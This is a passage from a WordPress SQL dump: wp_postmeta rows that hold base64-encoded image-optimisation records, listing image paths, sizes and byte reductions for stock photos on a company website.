8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS0xNjAweDEwNjAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTE2MDB4MTA2MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTE2MDB4MTA2MC5qcGciLCJyZWR1Y3Rpb24iOjM2OTAsInRpbWUiOjE0ODM1ODE2NjYsImlkIjo3OTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NjEsInRpbWUiOjE0ODM1ODE2NzAsImlkIjo3OTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjMsInRpbWUiOjE0ODM1ODE2NzMsImlkIjo3OTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MDgsInRpbWUiOjE0ODM1ODE2NzYsImlkIjo3OTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMDUxLCJ0aW1lIjoxNDgzNTgxNjgxLCJpZCI6NzkyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MzMsInRpbWUiOjE0ODM1ODE2ODQsImlkIjo3OTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ4MiwidGltZSI6MTQ4MzU4MTY4NywiaWQiOjc5Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjA1LCJ0aW1lIjoxNDgzNTgxNjkxLCJpZCI6NzkyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NjksInRpbWUiOjE0ODM1ODE2OTQsImlkIjo3OTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTQ3NzUwNTQ1LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE0Nzc1MDU0NS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNDc3NTA1NDUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjcxOSwidGltZSI6MTQ4MzU4MTY5OCwiaWQiOjc5Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (29970, 787, 'wpfc_optimisation_reduction', '2195499'); 
INSERT INTO `wp_postmeta` VALUES (29971, 787, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEuanBnIiwid2lkdGgiOjMwNzIsImhlaWdodCI6MjA0OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEuanBnIiwicmVkdWN0aW9uIjoyMTk1NDg2LCJ0aW1lIjoxNDgzNTgxNzA5LCJpZCI6Ijc4NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNzEyLCJpZCI6Nzg3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MTcxNSwiaWQiOjc4N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODE3MTgsImlkIjo3ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODE3MjEsImlkIjo3ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNzI0LCJpZCI6Nzg3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MTcyNiwiaWQiOjc4N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODE3MjksImlkIjo3ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNzMxLCJpZCI6Nzg3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNzM0LCJpZCI6Nzg3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNzM2LCJpZCI6Nzg3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNzM4LCJpZCI6Nzg3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNzQxLCJpZCI6Nzg3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE5MS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExOTEtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjk1NDMxMTkxLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNzQ0LCJpZCI6Nzg3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29972, 786, 'wpfc_optimisation_reduction', '2108754'); 
INSERT INTO `wp_postmeta` VALUES (29973, 786, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE4Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExODIuanBnIiwid2lkdGgiOjMwNzIsImhlaWdodCI6MjA0OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExODIuanBnIiwicmVkdWN0aW9uIjoyMTA4NzQxLCJ0aW1lIjoxNDgzNTgxNzU1LCJpZCI6Ijc4NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5NTQzMTE4Mi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTU0MzExODItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXB